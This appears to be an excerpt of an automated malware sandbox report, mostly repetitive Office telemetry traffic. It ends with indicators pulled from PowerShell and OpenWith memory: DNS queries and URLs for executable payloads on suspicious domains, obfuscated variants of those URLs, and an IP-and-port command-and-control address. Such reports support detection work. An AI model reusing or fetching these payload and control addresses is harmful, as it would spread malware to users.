Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UU6vZgkzccoB6vM&MD=LgcgFu8w HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic DNS traffic detected: DNS query: 1h982d.bemostake.space
Source: global traffic DNS traffic detected: DNS query: bemostake.space
Source: global traffic DNS traffic detected: DNS query: rocketdocs.lol
Source: powershell.exe, 00000003.00000002.1496205695.000001CB4C784000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://1h982d.bemostake.space
Source: powershell.exe, 00000003.00000002.1496205695.000001CB4C877000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bemostake.space
Source: powershell.exe, 00000003.00000002.1588196823.000001CB5B152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1588196823.000001CB5B294000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1531963809.000002746C47F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.1483066316.000002745C638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1496205695.000001CB4C8E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://rocketdocs.lol
Source: powershell.exe, 00000005.00000002.1483066316.000002745C638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.1496205695.000001CB4B0E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1483066316.000002745C411000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1483066316.000002745C638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000005.00000002.1483066316.000002745C638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.1557020180.0000027474C32000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.c
Source: OpenWith.exe, 0000000C.00000003.1674577922.0000022BF8509000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1682202435.0000022BF8511000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1708130009.0000022BF8513000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm
Source: powershell.exe, 00000003.00000002.1496205695.000001CB4C25F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://1h982d.bemostake.space
Source: powershell.exe, 00000003.00000002.1496205695.000001CB4C25F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://1h982d.bemostake.space/test.txt
Source: powershell.exe, 00000003.00000002.1496205695.000001CB4C25F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://1h982d.bp24mostakp24.spacp24/tp24st.txt
Source: OpenWith.exe, 0000000C.00000003.1671295131.0000022BF85DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000003.00000002.1496205695.000001CB4B0E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1483066316.000002745C411000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1483066316.000002745C638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000003.00000002.1496205695.000001CB4C7CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bemostake.space
Source: powershell.exe, 00000003.00000002.1496205695.000001CB4C7CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe
Source: powershell.exe, 00000003.00000002.1496205695.000001CB4C7CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bp24mostakp24.spacp24/tp24st/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.p24xp24
Source: OpenWith.exe, 0000000C.00000003.1671295131.0000022BF85DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OpenWith.exe, 0000000C.00000003.1671295131.0000022BF85DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OpenWith.exe, 0000000C.00000003.1671295131.0000022BF85DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000005.00000002.1531963809.000002746C47F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1531963809.000002746C47F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1531963809.000002746C47F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: OpenWith.exe, 0000000C.00000003.1671295131.0000022BF85DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OpenWith.exe, 0000000C.00000003.1671295131.0000022BF85DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OpenWith.exe, 0000000C.00000003.1671295131.0000022BF85DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000005.00000002.1483066316.000002745C638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1496205695.000001CB4C25F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1588196823.000001CB5B152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1588196823.000001CB5B294000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1531963809.000002746C47F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1496205695.000001CB4C8E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rocketdocs.lol
Source: powershell.exe, 00000003.00000002.1496205695.000001CB4C8E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rocketdocs.lol/utox_x86.exe
Source: powershell.exe, 00000003.00000002.1496205695.000001CB4C8E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rockp24tdocs.lol/utox_x86.p24xp24
